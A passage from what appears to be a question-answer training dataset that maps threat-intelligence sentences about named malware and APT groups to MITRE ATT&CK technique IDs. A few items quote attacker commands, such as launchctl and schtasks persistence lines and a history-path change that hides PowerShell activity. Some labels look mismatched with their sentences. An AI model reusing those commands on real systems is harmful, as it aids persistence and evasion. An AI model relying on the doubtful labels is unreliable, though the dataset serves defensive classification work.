ID from MITRE ATT&CK framework.,Sometimes it is a high profile, legitimate site such as “diplomacy.pl”, hosting a ZIP archive### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI has modified ComSysApp service to load the malicious DLL payload.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 used a PowerShell script to launch shellcode that retrieved an additional payload.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HIDEDRV injects a DLL for Downdelph into the explorer.exe process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use a custom command and control protocol that can be encapsulated in DNS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DOGCALL is capable of logging keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EKANS can use Windows Mangement Instrumentation calls to execute operations.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The FireEye FLARE team released a WMI repository-parsing tool that allows investigators to extract embedded data from the WMI repository and identify WMI persistence.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After obtaining the unique ID from the C2 server, the Trojan calls the “SetAbStatById” method to notify the C2 server of its status of “1” to notify the server it had successfully received the filename and file data### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MobileOrder exfiltrates data collected from the victim mobile device.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher performs UAC bypass.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sharpshooter has sent malicious DOC and PDF files to targets so that they can be opened by a user.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Use of the non-public PowerShell backdoor previously described by Morphisec and MalwareBytes (which we refer to as POWERSTATS)### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT accesses the HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData Registry key to obtain the System manufacturer value to identify the machine type.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZeroT has used DLL side-loading to load malicious payloads.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It has also used PowerShell to execute commands and move laterally through a victim network.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has registered domain names and created URLs that are often designed to mimic or spoof legitimate websites, such as email login pages, online file sharing and storage websites, and password reset pages.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon has used encrypted strings.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kessel can download additional modules from the C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has loaded a plist file using the launchctl command.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA551 has retrieved DLLs and installer binaries for malware execution from C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common uses include hosting malicious scripts on websites as part of a Drive-by Compromise or downloading and executing these script files as secondary payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has been seen using RDP for lateral movement and persistence, in some cases employing the rdpwinst tool for mangement of multiple sessions.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,zwShell can obtain the name of the logged-in user on the victim.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse these OS API functions as a means of executing behaviors.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used PowerShell to execute commands and other operational tasks.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE has used .NET packer tools to evade detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Property list with persistence settings launchctl load /Library/LaunchDaemons/filename.plist > /dev/nul or launchctl load ~/Library/LaunchAgents/ filename.plist > /dev/nul will then command the operating system to start the dropped backdoor file at login### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used the Telegram Bot API from Telegram Messenger to send and receive commands to its Python backdoor.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In many cases, additional stealers, RATs, and other malware were observed being hosted on the same web servers.Analysis of HawkEye Reborn The campaign starts with sending the aforementioned Excel sheets that exploit the well-known CVE-2017-11882 vulnerability, an arbitrary code execution bug in Microsoft Office### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,xCaon has checked for the existence of Kaspersky antivirus software on the system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Filename qrat.exe File Size 1093120 bytes MD5 c05e5131b196f43e1d02ca5ccc48ec0e SHA1 f28c592833f234c619917b5c7d8974840a810247 Notes Dropper that installs QuasarRAT file microsoft_network.exe and scheduled task wrapper file Microsoft.Win32.TaskScheduler.dll### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy has used Tor relays for Command and Control servers.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MURKYTOP has the capability to retrieve information about groups.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mis-Type uses cmd.exe to run commands for enumerating the host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HyperBro has the ability to take screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork leveraged the DDE protocol to deliver their malware.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gorgon Group malware can use process hollowing to inject one of its trojans into another process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Word 2016 will first look for Normal.dotm under C:\Program Files \Microsoft Office\root\Office16\, or by modifying the GlobalDotName registry key.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs collects a list of running services with the command tasklist /v.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Threat Group-3390 tool can use a public UAC bypass method to elevate privileges.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie allows the attacker to provide and subsequently execute a batch script (BAT), executable file (EXE), or dynamic-link library (DLL)### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE has used web services including Paste.ee to host payloads.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework., Get-PassPol### Assistant: T1201: Password Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TURNEDUP is capable of downloading additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The following function written in Python may be used to decode this file:def decode(data): out = """" c = 0 for d in data: out += chr(ord(d)^c) c+=1 return outOnce decoded it is discovered that this instance of OceanSalt attempts to communicate with 61.14.210[.]72 on port 7117### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can execute its embedded components via CreateProcessA and ShellExecute.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has used shell scripts to execute commands after installation and set persistence mechanisms.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conficker uses the current UTC victim system date for domain generation and connects to time servers to determine the current date.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has used LoadLibrary, GetProcAddress and CreateRemoteThread API functions to execute its shellcode.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY can decrypt encrypted strings and write them to a newly created folder.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If it is successful then it will send out basic host information and await further commands.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec contains a network loader to receive executable modules from remote attackers and run them on the local victim.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MechaFlounder has the ability to use HTTP in communication with C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RedLeaves can obtain information about network parameters.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 leveraged privileged accounts to replicate directory service data with domain controllers.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows API calls ### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about the installed software may also be exposed to adversaries via online or other accessible data sets .### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has attempted to hide its payload by using legitimate file names such as ""iconcache.db"".### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap has installed itself via crontab.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet enumerates removable drives for infection.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also take steps to cultivate a persona around the email account, such as through use of Social Media Accounts, to increase the chance of success of follow-on behaviors.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used Putty Secure Copy Client to transfer data.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Any crontab files are stored in operating system-specific file paths.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After collecting documents from removable media, Prikormka compresses the collected files, and encrypts it with Blowfish.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT18 uses cmd.exe to execute commands on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets , also known as a golden ticket.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can check the compromised host for the presence of multiple executables associated with analysis tools and halt execution if any are found.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS's backdoor code is a multi-layer obfuscated, encoded, and compressed blob.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoleNet can achieve persitence on the infected machine by setting the Registry run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model assemblies.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell can use a decryption mechanism to process a user supplied password and allow execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind obtains the victim username.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,remote template ### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used PowerShell on compromised systems.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has been observed disabling the system firewall.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has presented the user with a UAC prompt to elevate privileges while installing.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has compromised email credentials in order to steal sensitive data.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon .### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The lnk files were an especially interesting development because the powershell code they contain for decoding and dropping the payload is nearly identical to that utilized by the Zebrocy threat actor a month earlier### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JHUHUGIT has registered itself as a service to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can use system resources to mine cryptocurrency, dropping XMRig to mine Monero.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gallmaker has used WinZip, likely to archive data prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RedLeaves is launched through use of DLL search order hijacking to load a malicious dll.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another JHUHUGIT variant has the capability to delete specified files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Enterprises can benefit from Trend Micro’s Smart Protection Suites with XGen security, which infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity and any endpoint### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kobalos can write captured SSH connection credentials to a file under the /var/run directory with a .pid extension for exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM tries to add a Registry Run key under the name ""Windows Update"" to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nebulae can enumerate processes on a target system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CookieMiner has used base64 encoding to obfuscate scripts on the system.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used tools that are capable of obtaining credentials from saved mail.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin has used Google Drive as a Command and Control channel.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With Domain Administrator rights, harvested or well-known SID values may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Depending on the permissions level of the vulnerable remote service an adversary may achieve Exploitation for Privilege Escalation as a result of lateral movement exploitation as well.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,T9000 can take screenshots of the desktop and target application windows, saving them to user directories as one byte XOR encrypted .dat files.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Two prominent protocols that have enabled Reflection Amplification Floods are DNS and NTP, though the use of several others in the wild have been documented.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackMould can run cmd.exe with parameters.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the key does not exist, gh0st RAT will create and run the service.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sharpshooter downloaded additional payloads after a target was infected with a first-stage downloader.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike has the ability to use an Excel Workbook to execute additional code by enabling Office to trust macros and execute code without user permission.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Caterpillar WebShell can run commands on the compromised asset with CMD functions.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has used CVE-2017-11882 to execute code on the victim's machine.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pteranodon can download and execute additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They have also dropped QuasarRAT binaries as files named microsoft_network.exe and crome.exe.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi performs exfiltration over BITSAdmin, which is also used for the C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SodaMaster can use RC4 to encrypt C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sharpshooter's first-stage downloader resolved various Windows libraries and APIs, including LoadLibraryA, GetProcAddress, and CreateProcessA.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RATANKBA gathers the victim’s IP address via the ipconfig -all command.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa used a payload that creates a hidden window.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has used first-stage payloads that download additional malware from C2 servers.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE can upload files from the victim's machine to its C2 server.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name .### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer has established persistence by creating the following scheduled task schtasks /create /sc minute /mo 1 /tn QQMusic ^ /tr C:Users\%USERPROFILE%\Downloads\spread.exe /F.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLATINUM has used the Intel® Active Management Technology Serial-over-LAN channel for command and control.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs collects a list of network shares with the command net share.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries possessing a valid Kerberos ticket-granting ticket may request one or more Kerberos ticket-granting service service tickets for any SPN from a domain controller .### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can spread itself by infecting other portable executable files on networks shared drives.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Volgmer variants add new services with display names generated by a list of hard-coded strings such as Application, Background, Security, and Windows, presumably as a way to masquerade as a legitimate service.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has rebooted victim machines to establish persistence by installing a SSP DLL.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Helminth has used a scheduled task for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used PowerShell for execution to assist in lateral movement as well as for dumping credentials stored on compromised machines.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Apps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command do not set this flag.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If after the package has been decoded its size is bigger than 3 bytes, the Trojan decrypts its first 11 bytes with XOR using the method similar to the one described above### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It hands over the decrypted buffer extracted from the resource section and the path from the original RegAsm executable to the start_protect_hexcode function.Then it starts the process-hollowing shellcode, which is stored in the HEXCODE1 variable### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Caterpillar WebShell can obtain a list of user accounts from a victim's machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A TYPEFRAME variant can force the compromised system to function as a proxy server.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The initial infection vector of this campaign is a Microsoft Office Excel Worksheet with an Office macro that uses the mshta.exe Windows executable to run scripts, which are embedded in the HTML of a specially-crafted blogspot.com page### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Javali can read C2 information from Google Documents and YouTube.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A noteworthy addition to the Poseidon toolkit is the IGT supertool (Information Gathering toolkit), a bulking 15 megabyte executable that orchestrates a series of different information collections steps, exfiltration, and the cleanup of components### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET performs AES-CBC encryption on files under ~/Documents, ~/Downloads, and ~/Desktop with a fixed key and renames files to give them a .enc extension.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The HyperShell and HighShell webshells are variants of what we track as TwoFace, with HyperShell being related to the TwoFace loader and HighShell being related to the TwoFace payload, as we reported in July 2017### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT deletes the .LNK file from the startup directory as well as the dropper components.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has called GetLogicalDrives to emumerate all mounted drives, and GetDriveTypeW to determine the drive type.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StreamEx has the ability to scan for security tools such as firewalls and antivirus tools.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.### Assistant: T1072: Software Deployment Tools" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WMI permanent event subscriptions can be used to trigger actions when specified conditions are met### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX has a module to create, delete, or modify Registry keys.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable Ingress Tool Transfer by placing it on an Internet accessible web server.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As with legitimate development efforts, different skill sets may be required for developing exploits.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN can send email over SMTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackTech has exploited a buffer overflow vulnerability in Microsoft Internet Information Services 6.0, CVE-2017-7269, in order to establish a new HTTP or command and control server.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI has used rundll32 for execution.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SNUGRIDE establishes persistence through a Registry Run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used modified versions of PHProxy to examine web traffic between the victim and the accessed website.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once these variables are set, the malware uses the SoapHttpClientProtocol class to communicate with its C2 server, which issues an HTTP POST requests that appears as: As you can see from the above request, the SoapHttpClientProtocol class neatly structures data into an HTTP POST request### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 has obtained and used publicly-available tools like Empire.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 used a Trojan called KEYLIME to capture keystrokes from the victim’s machine.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stateless protocols such as UDP or ICMP are commonly used 